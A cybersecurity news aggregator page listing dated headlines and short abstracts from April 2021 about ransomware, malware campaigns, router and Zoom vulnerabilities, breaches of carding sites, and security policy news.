The FBI arrested a man for allegedly planning a bomb attack against Amazon Web Services (AWS) to kill about 70% of the internet. The FBI arrested Seth Aaron Pendley (28), from Texas, for allegedly planning to launch a bomb attack against Amazon Web Services...Security Affairs
April 10, 2021 – Malware
Facebook ads dropped malware posing as Clubhouse app for PC Full Text
Abstract
Threat actors are delivering Facebook ads promoting Clubhouse app for PC to deliver the malware. The attackers have used the old tactics again because the PC version of the Clubhouse app is not yet released.Hackread
April 10, 2021 – Vulnerabilities
Cisco will not release updates to fix critical RCE flaw in EoF Business Routers Full Text
Abstract
According to a security advisory published by the company, Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers are affected by Remote Command Execution vulnerability that resides in the Management Interface.Security Affairs
April 10, 2021 – Ransomware
New REvil Ransomware Version Automatically Logs Windows into Safe Mode Full Text
Abstract
Once more, the well-known REvil ransomware has elevated its attack vector to change the target victim’s login password in order to reboot the computer into Windows Safe Mode.Heimdal Security
April 10, 2021 – Malware
Collaboration Platforms Increasingly Abused for Malware Distribution, Data Exfiltration Full Text
Abstract
Threat actors are increasingly abusing collaboration platforms for nefarious purposes, including malware delivery and data exfiltration, security researchers with Cisco’s Talos division report.Security Week
April 10, 2021 – Outage
Kentucky Unemployment Insurance Site Shuttered After Attack Full Text
Abstract
All the Office of Unemployment Insurance websites and portals dealing with unemployment accounts were taken offline as state IT workers attempted to bolster systems' cybersecurity capabilities, officials say.Gov Info Security
April 09, 2021 – General
Hillicon Valley: Amazon wins union election — says ‘our employees made the choice’ Full Text
Abstract
STORY OF THE DAY: Amazon came out victorious at the end of a two day vote counting session in the election to unionize the e-commerce giant’s facility in Bessemer, Ala. The closely watched election ended up breaking fairly heavily in Amazon’s favor:The Hill
April 09, 2021 – Hacker
Hackers Tampered With APKPure Store to Distribute Malware Apps Full Text
Abstract
APKPure, one of the largest alternative app stores outside of the Google Play Store, was infected with malware this week, allowing threat actors to distribute Trojans to Android devices. In an incident that's similar to that of German telecommunications equipment manufacturer Gigaset , the APKPure client version 3.17.18 is said to have been tampered with in an attempt to trick unsuspecting users into downloading and installing malicious applications linked to the malicious code built into the APKpure app. The development was reported by researchers from Doctor Web and Kaspersky . "This trojan belongs to the dangerous Android.Triada malware family capable of downloading, installing and uninstalling software without users' permission," Doctor Web researchers said. According to Kaspersky, the APKPure version 3.17.18 was tweaked to incorporate an advertisement SDK that acts as a Trojan dropper designed to deliver other malware to a victim's device. "ThiThe Hacker News
April 9, 2021 – Vulnerabilities
Zerodium will pay $300K for WordPress RCE exploits Full Text
Abstract
Zero-day broker Zerodium announced that will triples payouts for remote code execution exploits for the popular WordPress content management system. Zero-day broker Zerodium has tripled the payouts for exploits for the WordPress content management...Security Affairs
April 9, 2021 – Business
LinkedIn confirms leak of 500 million profiles online, maintains incident was not a breach Full Text
Abstract
LinkedIn has become one of the most impersonated brands when it comes to phishing, and having access to such a treasure trove of information can help facilitate convincing social engineering attacks.SCMagazine
April 9, 2021 – 5G
March to 5G could pile on heavier security burden for IoT device manufacturers Full Text
Abstract
The financial burden of compliance with piling security standards could force some device manufacturers to walk away from highly regulated buyers like the Pentagon.SCMagazine
April 9, 2021 – Ransomware
To avoid penalties for ransomware payouts, incident response pros press for due diligence Full Text
Abstract
The onus is also on the threat intelligence community, said one IR expert, to practice responsible ransomware attribution, as it can affect companies’ decisions on whether or not to pay.SCMagazine
April 09, 2021 – Ransomware
The Week in Ransomware - April 9th 2021 - Massive ransom demands Full Text
Abstract
Ransomware attacks continue over the past two weeks with a continuation of the massive initial ransom demands we have seen recently.BleepingComputer
April 9, 2021 – Covid-19
Fresh Cyberattack Waves and Latest Statistics on COVID-19 Full Text
Abstract
With multiple adversaries continuing to leverage the pandemic, an interesting technique by cybercriminals has surfaced that uses unique staging and execution mechanisms via a malicious doc.Cyware Alerts - Hacker News
April 09, 2021 – Government
Biden budget request calls for major investments in cybersecurity, emerging technologies Full Text
Abstract
President Biden called for over $1.3 billion in cybersecurity funds as part of his proposed budget request sent to Congress on Friday, along with major investments in emerging technologies such as quantum computing and artificial intelligence.The Hill
April 9, 2021 – Disinformation
Facebook Removes 16k Groups for Trading Fake Reviews Full Text
Abstract
Double intervention by UK watchdog prompts Facebook to axe groups trading in fake reviewsInfosecurity Magazine
April 9, 2021 – Government
The U.S. Government Needs to Overhaul Cybersecurity. Here’s How. Full Text
Abstract
In advance of the new Biden administration cybersecurity executive order, it’s time for the federal government to get proactive about cybersecurity.Lawfare
April 9, 2021 – Vulnerabilities
Cisco will not release updates to fix critical RCE flaw in EoF Business Routers Full Text
Abstract
Cisco announced it will not release security updates to address a critical security vulnerability affecting some of its Small Business routers. Cisco is urging customers that are using some of its Small Business routers to replace their devices because...Security Affairs
April 9, 2021 – Privacy
Rhythm in the algorithm: digital rights groups call on Spotify to abandon voice recognition invention Full Text
Abstract
Activists launched a campaign to pressure Spotify to abandon plans for an AI-powered system that listens to your conversations in order to recommend music choices. The controversy spotlights a challenge faced by some of the most tech savvy companies: how to walk the line between innovation that serves the innate desires of consumers, and violation of their rights for information security and privacy.SCMagazine
April 9, 2021 – Policy and Law
DOJ: Creep Coach Finagles Nude Athlete Photos Full Text
Abstract
Allegedly perv college coach charged with cyberstalking and extorting nudes from his female athletes.Threatpost
April 09, 2021 – Policy and Law
FBI arrests man for plan to kill 70% of Internet in AWS bomb attack Full Text
Abstract
The FBI arrested a Texas man on Thursday for allegedly planning to "kill of about 70% of the internet" in a bomb attack targeting an Amazon Web Services (AWS) data center on Smith Switch Road in Ashburn, Virginia.BleepingComputer
April 9, 2021 – General
Attackers are Tearing Apart the Retail Sector Full Text
Abstract
Disruptive cyberattacks on retailers becoming more common and experts have recently noted the use of double-extortion technique among hackers targeting retail organizations.Cyware Alerts - Hacker News
April 9, 2021 – Policy and Law
US Jails Cyber-stalker Who Targeted Attack Survivor Full Text
Abstract
Florida man who cyberstalked survivor of murder attempt is sent to prisonInfosecurity Magazine
April 09, 2021 – Ransomware
Leading cosmetics group Pierre Fabre hit with $25 million ransomware attack Full Text
Abstract
Leading French pharmaceutical group Pierre Fabre suffered a REvil ransomware attack where the threat actors initially demanded a $25 million ransom, BleepingComputer learned today.BleepingComputer
April 9, 2021 – APT
APTs Exploiting Fortinet VPN Security Vulnerabilities - Cybersecurity Agencies Warn Full Text
Abstract
Nation-state APTs are actively exploiting known vulnerabilities in the Fortinet FortiOS cybersecurity OS to gain initial access to multiple government, commercial, and technology services.Cyware Alerts - Hacker News
April 9, 2021 – Vulnerabilities
LifeLabs Launches Vulnerability Disclosure Program Full Text
Abstract
Canadian medical laboratory teams up with Bugcrowd to boost cybersecurityInfosecurity Magazine
April 09, 2021 – Malware
Attackers deliver legal threats, IcedID malware via contact forms Full Text
Abstract
Threat actors are using legitimate corporate contact forms to send phishing emails that threaten enterprise targets with lawsuits and attempt to infect them with the IcedID info-stealing malware.BleepingComputer
April 9, 2021 – Vulnerabilities
Critical Zoom vulnerability triggers remote code execution without user input Full Text
Abstract
The researchers from Computest demonstrated a three-bug attack chain against Zoom that caused remote code execution on a target machine, and all without any form of user interaction.ZDNet
April 09, 2021 – Breach
World’s largest pathologists association discloses credit card incident Full Text
Abstract
The American Society for Clinical Pathology (ASCP) disclosed a payment card incident that impacted customers who entered payment info on its e-commerce website.BleepingComputer
April 9, 2021 – Phishing
The geography and network characteristics of phishing attacks Full Text
Abstract
The country where emails originate and the number of countries they are routed through on the way to their final destination offer important warning signs of phishing attacks.Barracuda
April 9, 2021 – Ransomware
Maze/Egregor ransomware cartel estimated to have made $75 million Full Text
Abstract
The group behind the Maze and Egregor ransomware operations are believed to have earned at least $75 million worth of Bitcoin from ransom payments following intrusions at companies all over the world.The Record
April 09, 2021 – Vulnerabilities
Zerodium triples WordPress remote code execution exploit payout Full Text
Abstract
Zerodium has announced today an increased interest in exploits Zerodium has announced today an increased interest in exploits for the WordPress content management system that achieve remote code execution.BleepingComputer
April 9, 2021 – Attack
Washington State Educational Organizations Targeted in Cryptojacking Campaign Full Text
Abstract
According to a new advisory released by Palo Alto Network's Unit 42 team, cryptojacking incidents have recently taken place against educational institutions in Washington State.ZDNet
April 09, 2021 – Malware
Alert — There’s A New Malware Out There Snatching Users’ Passwords Full Text
Abstract
A previously undocumented malware downloader has been spotted in the wild in phishing attacks to deploy credential stealers and other malicious payloads. Dubbed " Saint Bot ," the malware is said to have first appeared on the scene in January 2021, with indications that it's under active development. "Saint Bot is a downloader that appeared quite recently, and slowly is getting momentum. It was seen dropping stealers (i.e. Taurus Stealer) or further loaders ( example ), yet its design allows [it] to utilize it for distributing any kind of malware," said Aleksandra "Hasherezade" Doniec, a threat intelligence analyst at Malwarebytes. "Furthermore, Saint Bot employs a wide variety of techniques which, although not novel, indicate some level of sophistication considering its relatively new appearance." The infection chain analyzed by the cybersecurity firm begins with a phishing email containing an embedded ZIP file ("bitcoin.zip&quoThe Hacker News
April 9, 2021 – General
NCSC: Large Number of Brits Are Using Easily Guessable Passwords Full Text
Abstract
The survey found 15% of Brits use their pet's name as a passwordInfosecurity Magazine
April 9, 2021 – Vulnerabilities
Pwn2Own 2021: participants earned $1,2M of the $1.5M prize pool Full Text
Abstract
The Pwn2Own 2021 hacking competition was concluded, participants earned more than $1.2 million, the greatest total payout ever. The Pwn2Own 2021 hacking competition reached the end, participants earned more than $1.2 million which is more than ever...Security Affairs
April 09, 2021 – Vulnerabilities
Researchers earn $1,2 million for exploits demoed at Pwn2Own 2021 Full Text
Abstract
Pwn2Own 2021 ended with contestants earning a record $1,210,000 for exploits and exploits chains demoed over the course of three days.BleepingComputer
April 9, 2021 – General
A rush to remote working leaving businesses vulnerable to cybercriminals Full Text
Abstract
Verizon reveals that many businesses may have left themselves vulnerable and open to cybercriminals in the rush to ensure their workforce could operate remotely during the pandemic.Help Net Security
April 09, 2021 – Education
[WHITEPAPER] How to Achieve CMMC Security Compliance for Your Business Full Text
Abstract
For organizations that deal with the defense infrastructure – cybersecurity is more than just a buzzword. Recently the US Department of Defense (DoD) created a new certification process – the Cybersecurity Maturity Model Certificate (CMMC) – to ensure that all its vendors and contractors follow established best cybersecurity practices. For organizations that work along the DoD supply chain, this means adhering to a strict regulatory framework, which can be quite complex. For one, must ensure that cybersecurity processes and practices are aligned with the type and sensitivity of the information that needs to be protected. Even though the model is tiered (from "basic cybersecurity hygiene" to "advanced"), organizations will expend a significant effort to ensure they align with the compliance level appropriate for their contracts. This is why one XDR provider has created a new guide to demonstrate how it helps organizations achieve CMMC compliance ( download the whitepaper here ). TThe Hacker News
April 9, 2021 – Insider Threat
Learning from Recent Insider Data Breaches Full Text
Abstract
Organizations need to ramp up their monitoring and detection capabilitiesInfosecurity Magazine
April 9, 2021 – Government
CISA releases post-compromise tool Aviary to review Microsoft 365 Full Text
Abstract
CISA released a Splunk-based dashboard for post-compromise activity in Microsoft Azure Active Directory (AD), Office 365, and MS 365 environments. The Cybersecurity and Infrastructure Security Agency (CISA) has released a Splunk-based dashboard,...Security Affairs
April 9, 2021 – Hacker
Cloud-native watering hole attack: Simple and potentially devastating Full Text
Abstract
The perpetrators are as diverse as their targets – fraudsters looking to steal identities, cybercriminal gangs in pursuit of quick profits, state-backed attackers seeking access to larger networks.Help Net Security
April 9, 2021 – General
#COVID19 Fraud Surge Threatens to Overwhelm Banks Full Text
Abstract
Remote workers struggle with disjointed systems and outdated technologyInfosecurity Magazine
April 9, 2021 – Breach
70,000 SSNs, 600,000 Credit Card Records Leaked After Swarmshop Gets Hacked Full Text
Abstract
On March 17, a huge cache of the site’s user and administrator data was leaked online to a different underground forum, a new report published Thursday by threat research firm Group-IB shows.Gizmodo
April 9, 2021 – Vulnerabilities
Moodle flaw exposed users to account takeover Full Text
Abstract
Moodle is an open-source educational platform used by 179,000 sites and has 242 million users. It allows universities to easily distribute content to students and teachers.Security Affairs
April 9, 2021 – Breach
Update: Belden Says Health-Related Information Exposed in Data Breach Full Text
Abstract
Specialty networking solutions provider Belden on Wednesday shared an update on the data breach disclosed in November 2020, and said health-related information was also exposed.Security Week
April 09, 2021 – Vulnerabilities
Cisco Will Not Patch Critical RCE Flaw Affecting End-of-Life Business Routers Full Text
Abstract
Networking equipment major Cisco Systems has said it does not plan to fix a critical security vulnerability affecting some of its Small Business routers, instead urging users to replace the devices. The bug, tracked as CVE-2021-1459, is rated with a CVSS score of 9.8 out of 10, and affects RV110W VPN firewall and Small Business RV130, RV130W, and RV215W routers, allowing an unauthenticated, remote attacker to execute arbitrary code on an affected appliance. The flaw, which stems from improper validation of user-supplied input in the web-based management interface, could be exploited by a malicious actor to send specially-crafted HTTP requests to the targeted device and achieve remote code execution. " A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system of the affected device," Cisco said in its advisory. Security researcher Treck Zhou has been credited with reporting the vulnerability. AlthoughThe Hacker News
April 9, 2021 – Breach
Hackers Hacked as Underground Carding Site is Breached Full Text
Abstract
Swarmshop admins, buyers and sellers on the receiving end of cyber-attackInfosecurity Magazine
April 9, 2021 – Business
SAP partners with Onapsis to mitigate active threats against unprotected SAP applications Full Text
Abstract
SAP and Onapsis jointly released a cyber threat intelligence report providing actionable information on how malicious threat actors are targeting unprotected mission-critical SAP applications.Help Net Security
April 09, 2021 – Malware
Gigaset Android Update Server Hacked to Install Malware on Users’ Devices Full Text
Abstract
Gigaset has revealed a malware infection discovered in its Android devices was the result of a compromise of a server belonging to an external update service provider. Impacting older smartphone models — GS100, GS160, GS170, GS180, GS270 (plus), and GS370 (plus) series — the malware took the form of multiple unwanted apps that were downloaded and installed through a pre-installed system update app. The infections are said to have occurred starting March 27 . The German manufacturer of telecommunications devices said it took steps to alert the update service provider of the issue, following which further infections were prevented on April 7. "Measures have been taken to automatically rid infected devices of the malware. In order for this to happen the devices must be connected to the internet (WLAN, WiFi or mobile data). We also recommend connecting the devices to their chargers. Affected devices should automatically be freed from the malware within 8 hours," the compThe Hacker News
April 9, 2021 – General
UK Firms Suffer Record Number of Cyber-Attacks in Q1 Full Text
Abstract
Remote working continues to expose organizationsInfosecurity Magazine
April 9, 2021 – Breach
330K stolen payment cards and 895K stolen gift cards sold on dark web Full Text
Abstract
A threat actor has sold almost 900,000 gift cards and over 300,000 payment cards on a cybercrime forum on the dark web. A crook has sold 895,000 gift cards and over 300,000 payment cards, for a total of US$38 million, on a top-tier Russian-language...Security Affairs
April 9, 2021 – Vulnerabilities
Report: Supplier Impersonation Attacks a Major Risk Full Text
Abstract
Threat actors are leveraging the supply chain to deliver various types of threats to organizations, and few of them are spared from such attacks, according to a new report from Proofpoint.Security Week
April 9, 2021 – Covid-19
Wine scams spiked during COVID-19 lockdown Full Text
Abstract
Wine-themed domain registrations rose once COVID-19 lockdowns took hold, some of them malicious and used in phishing campaigns, Recorded Future and Area 1 Security said in a joint report.Cyberscoop
April 9, 2021 – Phishing
Hackers Use Google Forms and Telegram bots to Collect Phished Credentials Full Text
Abstract
Cybercriminals are increasingly using legitimate services such as Google Forms and Telegram to gather user data stolen on phishing websites. Alternative ways...Cyber Security News
April 08, 2021 – Vulnerabilities
Google Chrome blocks port 10080 to stop NAT Slipstreaming attacks Full Text
Abstract
Google Chrome is now blocking HTTP, HTTPS, and FTP access to TCP port 10080 to prevent the ports from being abused in NAT Slipstreaming 2.0 attacks.BleepingComputer
April 8, 2021 – Phishing
Digital artists meet scam artists, as criminals pounce on NFT craze Full Text
Abstract
Criminals are standing up fraudulent NFT-themed websites that sell nonexistent items or phish users’ credentials.SCMagazine
April 8, 2021 – Breach
Hackers hit nine countries, expose 623,036 payment card records Full Text
Abstract
Hackers hacking hackers: User data of the Swarmshop card shop – which trades in stolen personal and payment records – was leaked online on March 17 and posted on a different underground forum.SCMagazine
April 08, 2021 – Government
CISA releases tool to review Microsoft 365 post-compromise activity Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) has released a companion Splunk-based dashboard that helps review post-compromise activity in Microsoft Azure Active Directory (AD), Office 365 (O365), and Microsoft 365 (M365) environments.BleepingComputer
April 08, 2021 – Attack
Major DC insurance provider hacked by ‘foreign cybercriminals’ Full Text
Abstract
CareFirst BlueCross BlueShield’s Community Health Plan District of Columbia (CHPDC) suffered a data breach carried out by what it described as a “foreign cybercriminal” group in January that potentially impacted sensitive data, the company told customers this week.The Hill
April 8, 2021 – Ransomware
Cring ransomware spread through hole in FortiGate VPN Full Text
Abstract
In the early months of 2021 the ransomware operators struck a series of European industrial networks.SCMagazine
April 8, 2021 – Malware
Adware Spreads via Fake TikTok App, Laptop Offers Full Text
Abstract
Cybercriminals are encouraging users to send the “offers” via WhatsApp to their friends as well.Threatpost
April 8, 2021 – Vulnerabilities
Zero-Day Bug Impacts Problem-Plagued Cisco SOHO Routers Full Text
Abstract
Cisco says it will not patch three small business router models and one VPN firewall device with critical vulnerabilities.Threatpost
April 08, 2021 – Vulnerabilities
Google Chrome blocks a new port to stop NAT Slipstreaming attacks Full Text
Abstract
Google Chrome is now blocking HTTP, HTTPS, and FTP access to TCP port 10080 to prevent the ports from being abused in NAT Slipstreaming 2.0 attacks.BleepingComputer
April 8, 2021 – Breach
Moodle flaw exposed users to account takeover Full Text
Abstract
Wizcase experts discovered a security flaw in the open-source learning platform Moodle that could allow accounts takeover. At the beginning of October 2020, the Wizcase cyber research team, led by Ata Hakcil, discovered a security vulnerability...Security Affairs
April 08, 2021 – Breach
Over 600,000 stolen credit cards leaked after Swarmshop hack Full Text
Abstract
The hacking spree targeting underground marketplaces has claimed another victim as a database from card shop Swarmshop emerged on another forum.BleepingComputer
April 8, 2021 – Malware
IcedID Banking Trojan Surges: The New Emotet? Full Text
Abstract
A widespread email campaign using malicious Microsoft Excel attachments and Excel 4 macros is delivering IcedID at high volumes, suggesting it’s filling the Emotet void.Threatpost
April 08, 2021 – Breach
Belden says health benefits data stolen in 2020 cyberattack Full Text
Abstract
Belden has disclosed that additional data was accessed and copied during their November 2020 cyberattack related to employees' healthcare benefits and family members covered under their plan.BleepingComputer
April 8, 2021 – Policy and Law
College Track Coach Accused of Cyberstalking Full Text
Abstract
Athletics coach arrested on suspicion of tricking female athletes into sending him nudesInfosecurity Magazine
April 8, 2021 – General
98% of Organizations Received Email Threats from Suppliers: What You Should Know Full Text
Abstract
Proofpoint’s recent research indicates that 98% of nearly 3,000 monitored organizations across the U.S., UK, and Australia, received a threat from a supplier domain over a 7-day window in February.Proofpoint
April 8, 2021 – Malware
(Are you) afreight of the dark? Watch out for Vyveva, new Lazarus backdoor Full Text
Abstract
ESET researchers have discovered a previously undocumented Lazarus malware backdoor used to attack a freight logistics company in South Africa, which they have dubbed Vyveva.ESET Security
April 08, 2021 – Breach
Belden finds more personal data stolen in 2020 cyberattack Full Text
Abstract
Belden has disclosed that additional data was accessed and copied during their November 2020 cyberattack related to employees' healthcare benefits and family members covered under their plan.BleepingComputer
April 8, 2021 – Business
OneTrust raises $210M to expand its enterprise compliance solutions Full Text
Abstract
OneTrust, a privacy, marketing, security, and data governance firm based in Atlanta, Georgia, today announced it has raised $210 million in a series C extension led by SoftBank’s Vision Fund 2.Venture Beat
April 8, 2021 – Vulnerabilities
BleedingTooth: Google drops full details of zero-click Linux Bluetooth bug chain leading to RCE Full Text
Abstract
A set of zero-click vulnerabilities in the Linux Bluetooth subsystem that allow nearby, unauthenticated attackers “to execute arbitrary code with kernel privileges on vulnerable devices”.The Daily Swig
April 8, 2021 – Breach
Hackers Compromised a Popular Carding Site Exposing 300,000 User Account Details Full Text
Abstract
The data breach on Card Mafia, a forum for stealing and trading credit cards, exposed email addresses, hashed passwords, usernames, and IP addresses of 297,744 carding site users.CPO Magazine
April 8, 2021 – Phishing
Stimulus Stimulates Unemployment Scams Full Text
Abstract
Suspicious unemployment-related emails up 50% in US since late FebruaryInfosecurity Magazine
April 8, 2021 – Breach
Swarmshop – What goes around comes around: hackers leak other hackers’ data online Full Text
Abstract
Group-IB, a global threat hunting and adversary-centric cyber intelligence company, discovered that user data of the Swarmshop card shop have been leaked online on March 17, 2021. The database was posted on a different underground forum...Security Affairs
April 08, 2021 – General
Microsoft releases a cyberattack simulator - Shall we play a game? Full Text
Abstract
Microsoft has released an open-source cyberattack simulator that allows security researchers and data scientists to create simulated network environments and see how they fare against AI-controlled cyber agents.BleepingComputer
April 08, 2021 – Government
Commerce blacklists seven Chinese supercomputing groups Full Text
Abstract
The Commerce Department on Thursday blacklisted seven Chinese supercomputing groups, adding the companies to its "entity list” as potential national security threats.The Hill
April 8, 2021 – General
Americans Avoid Sites After Forgetting Passwords Full Text
Abstract
Password forgetfulness triggers site and account avoidance in 64% of AmericansInfosecurity Magazine
April 8, 2021 – Vulnerabilities
Pwn2Own 2021 Day 2 – experts earned $200K for a zero-interaction Zoom exploit Full Text
Abstract
Pwn2Own 2021 - Day 2: a security duo earned $200,000 for a zero-interaction Zoom exploit allowing remote code execution. One of the most interesting working exploits of the second day of the Pwn2Own 2021 was demonstrated by security researchers Daan...Security Affairs
April 08, 2021 – Vulnerabilities
Windows 10 hacked again at Pwn2Own, Chrome and Zoom also fall Full Text
Abstract
Contestants hacked Microsoft's Windows 10 OS twice during the second day of the Pwn2Own 2021 competition, together with the Google Chrome web browser and the Zoom video communication platform.BleepingComputer
April 8, 2021 – Vulnerabilities
Cisco RCE Flaws Let Attackers Let Attackers Escalate Privileges Full Text
Abstract
Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or allow an authenticated, local...Cyber Security News
April 8, 2021 – Ransomware
Did 4 Major Ransomware Groups Truly Form a Cartel? Full Text
Abstract
The four cybercriminal groups — Twisted Spider, Viking Spider, Wizard Spider, and the Lockbit Gang — announced at different times throughout summer 2020 that they would be working together.Dark Reading
April 08, 2021 – Malware
Researchers uncover a new Iranian malware used in recent cyberattacks Full Text
Abstract
An Iranian threat actor has unleashed a new cyberespionage campaign against a possible Lebanese target with a backdoor capable of exfiltrating sensitive information from compromised systems. Cybersecurity firm Check Point attributed the operation to APT34, citing similarities with previous techniques used by the threat actor as well as based on its pattern of victimology. APT34 (aka OilRig) is known for its reconnaissance campaigns aligned with the strategic interests of Iran, primarily hitting financial, government, energy, chemical, and telecommunications industries in the Middle East. The group typically resorts to targeting individuals through the use of booby-trapped job offer documents, delivered directly to the victims via LinkedIn messages, and the latest campaign is no exception, although the mode of delivery remains unclear as yet. The Word document analyzed by Check Point — which was uploaded to VirusTotal from Lebanon on January 10 — claims to offer information aboThe Hacker News
April 8, 2021 – Breach
Scraped data of 500 million LinkedIn users being sold online, 2 million records leaked as proof Full Text
Abstract
Days after a massive Facebook data leak made the headlines, 500 million LinkedIn users are being sold online, seller leaked 2 million records as proof. Original Post at https://cybernews.com/news/stolen-data-of-500-million-linkedin-users-being-sold-online-2-million-leaked-as-proof-2/ An...Security Affairs
April 8, 2021 – Business
Cofense acquires Cyberfish to eliminate the need for legacy email security solutions Full Text
Abstract
Cofense announced the acquisition of Cyberfish, a provider of next-generation phishing protection powered by Computer Vision and advanced Machine Learning (ML) technology.Help Net Security
April 8, 2021 – Malware
Yanbian Gang Malware Continues with Wide-Scale Distribution and C2 Full Text
Abstract
Yanbian Gang has targeted South Korean Android mobile banking customers since 2013 with malicious Android apps purporting to be from major banks, namely Shinhan Savings Bank, Saemaul Geumgo, and more.Risk IQ
April 08, 2021 – Phishing
Microsoft Office 365 phishing evades detection with HTML Lego pieces Full Text
Abstract
A recent phishing campaign used a clever trick to deliver the fraudulent web page that collects Microsoft Office 365 credentials by building it from chunks of HTML code stored locally and remotely.BleepingComputer
April 8, 2021 – IOT
Massive increase in endpoint attacks, rising rate of encrypted malware and new exploits targeting IoT Full Text
Abstract
Fileless malware and cryptominer attack rates grew by nearly 900% and 25% respectively, while unique ransomware payloads plummeted by 48% in 2020 compared to 2019, according to WatchGuard.Help Net Security
April 08, 2021 – Ransomware
Hackers Exploit Unpatched VPNs to Install Ransomware on Industrial Targets Full Text
Abstract
Unpatched Fortinet VPN devices are being targeted in a series of attacks against industrial enterprises in Europe to deploy a new strain of ransomware called "Cring" inside corporate networks. At least one of the hacking incidents led to the temporary shutdown of a production site, said cybersecurity firm Kaspersky in a report published on Wednesday, without publicly naming the victim. The attacks happened in the first quarter of 2021, between January and March. "Various details of the attack indicate that the attackers had carefully analyzed the infrastructure of the targeted organization and prepared their own infrastructure and toolset based on the information collected at the reconnaissance stage," said Vyacheslav Kopeytsev, a security researcher at Kaspersky ICS CERT. The disclosure comes days after the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warned of advanced persistent threat (APT) actorThe Hacker News
April 8, 2021 – General
Online Fraud in the UK Up 179% in the Last Decade Full Text
Abstract
UK has been more heavily impacted by online fraud than any other country in EuropeInfosecurity Magazine
April 8, 2021 – Vulnerabilities
Cisco fixed multiple flaws in SD-WAN vManage Software, including a critical RCE Full Text
Abstract
Cisco has addressed a critical pre-authentication remote code execution (RCE) vulnerability in the SD-WAN vManage Software. Cisco has addressed multiple vulnerabilities in Cisco SD-WAN vManage Software that could be exploited by an unauthenticated,...Security Affairs
April 08, 2021 – Malware
North Korean hackers use new Vyveva malware to attack freighters Full Text
Abstract
The North Korean-backed Lazarus hacking group used new malware with backdoor capabilities dubbed Vyveva by ESET researchers in targeted attacks against a South African freight logistics company.BleepingComputer
April 8, 2021 – Malware
Fake Trezor App Steals Cryptocurrency Worth Over $1 Million From Users Full Text
Abstract
According to the Washington Post, the fake Trezor app, which was on the App Store for at least two weeks (from 22 January to 3 February), was downloaded 1,000 times before it was taken down.Malwarebytes Labs
April 08, 2021 – Policy and Law
NIST and HIPAA: Is There a Password Connection? Full Text
Abstract
When dealing with user data, it's essential that we design our password policies around compliance. These policies are defined both internally and externally. While companies uphold their own password standards, outside forces like HIPAA and NIST have a heavy influence. Impacts are defined by industry and one's unique infrastructure. How do IT departments maintain compliance with NIST and HIPAA? We'll discuss each compliance measure and its importance in this article. What is NIST compliance? Defined by the National Institute of Standards and Technology, NIST compliance aims to harden federal systems against cyber-attacks. While the agency is non-regulatory, it is part of the U.S. Department of Commerce, which has plenty of influence over government agencies and their contractors. For example, NIST guidelines help agencies satisfy the requirements of the Federal Information Security Management Act (FISMA). NIST is instrumental in creating Federal Information ProceThe Hacker News
April 8, 2021 – General
Armed Conflict Draws Closer as State-Backed Cyber-Attacks Intensify Full Text
Abstract
HP report reveals 100% increase in government-sponsored attacksInfosecurity Magazine
April 08, 2021 – Phishing
Tech support scammers lure victims with fake antivirus billing emails Full Text
Abstract
Tech support scammers are pretending to be from Microsoft, McAfee, and Norton to target users with fake antivirus billing renewals in a large-scale email campaign.BleepingComputer
April 8, 2021 – Ransomware
Ransomware Attacks Disrupt Production at Two Manufacturing Sites in Italy Full Text
Abstract
A ransomware incident earlier this year temporarily shut down production for two days at a pair of manufacturing facilities in Italy, incident responders at security firm Kaspersky said Wednesday.Cyberscoop
April 8, 2021 – Business
ACC Launches Data Security Program for Law Firms Full Text
Abstract
Program will enable prospective clients to assess and compare law firms’ data security standardsInfosecurity Magazine
April 8, 2021 – Breach
Office Depot Europe Exposed Customer Data Online: Report Full Text
Abstract
The records were labeled “Production” and contained customer PIIs such as names, phone numbers, physical addresses (home and/or office), @members.ebay addresses, and hashed passwords.Website Planet
April 8, 2021 – General
Number of US Breach Victims Jumps 564% in Q1 2021 Full Text
Abstract
ITRC data reveals an increase of just 12% in incidentsInfosecurity Magazine
April 8, 2021 – Hacker
Hackers Are Exploiting Discord and Slack Links to Serve Up Malware Full Text
Abstract
New research by Talos highlights how, over the course of the Covid-19 pandemic, collaboration tools like Slack and, much more commonly, Discord have become handy mechanisms for cybercriminals.Wired
April 8, 2021 – APT
New APT27 Cyberespionage Campaign Unveiled Full Text
Abstract
Kaspersky spotted a cyberespionage campaign targeted against government and military organizations in Vietnam via DLL side-loading.Cyware Alerts - Hacker News
April 8, 2021 – Vulnerabilities
Google Patches Critical Code Execution Vulnerability in Android Full Text
Abstract
The April 2021 Android security bulletin by Google describes more than 30 vulnerabilities in the mobile operating system, including a remote code execution flaw in the System component.Security Week
April 8, 2021 – Criminals
Cybercriminals Crack Cheat Codes and Gaming Mods to Serve Trojans Full Text
Abstract
The methodology of the attack involved adding cryptors to cheat codes, cheat engines, and mods that made it challenging for security teams to analyze the attack.Cyware Alerts - Hacker News
April 8, 2021 – Breach
User database was also hacked in the recent hack of PHP ‘s Git Server Full Text
Abstract
The maintainers of the PHP programming language confirmed that threat actors may have compromised a user database containing their passwords. The maintainers of the PHP programming language have provided an update regarding the security breach that...Security Affairs
April 8, 2021 – Hacker
Hackers Selling 330,000 Stolen Payment Cards and 895,000 Gift Cards from Online Shops Full Text
Abstract
What do the likes of AirBnB, Amazon, American Airlines, Chipotle, Dunkin Donuts, Nike, Marriott, Target, Subway and Walmart, have in common? Well,...Cyber Security News
April 8, 2021 – Ransomware
New Cring ransomware deployed via unpatched Fortinet VPNs | The Record by Recorded Future Full Text
Abstract
All these attacks happened in Q1 2020, and they were carried out with a new strain of ransomware named Cring (other aliases include Vjiszy1lo, Ghost, Phantom) that was first discovered in January.The Record
April 8, 2021 – Malware
BazarCall Trojan: A Malware Backed by Call Centers Full Text
Abstract
Security experts are reporting about the distribution of BazarCall malware via fake call centers. Under the aforementioned campaign, threat actors trick users into installing the Windows malware.Cyware Alerts - Hacker News
April 8, 2021 – General
Firmware-Focused Cyberattacks are Rising Full Text
Abstract
After taking inputs from1,000 enterprise security decision-makers from China, Germany, Japan, the U.K, and the U.S, Microsoft uncovered that 80% of global enterprises experienced firmware attacks.Cyware Alerts - Hacker News
April 8, 2021 – Policy and Law
Italian Arrested After Allegedly Paying Hitman to Murder Ex-Girlfriend Full Text
Abstract
Europol officers analyzed crypto-transactions to trace individualInfosecurity Magazine
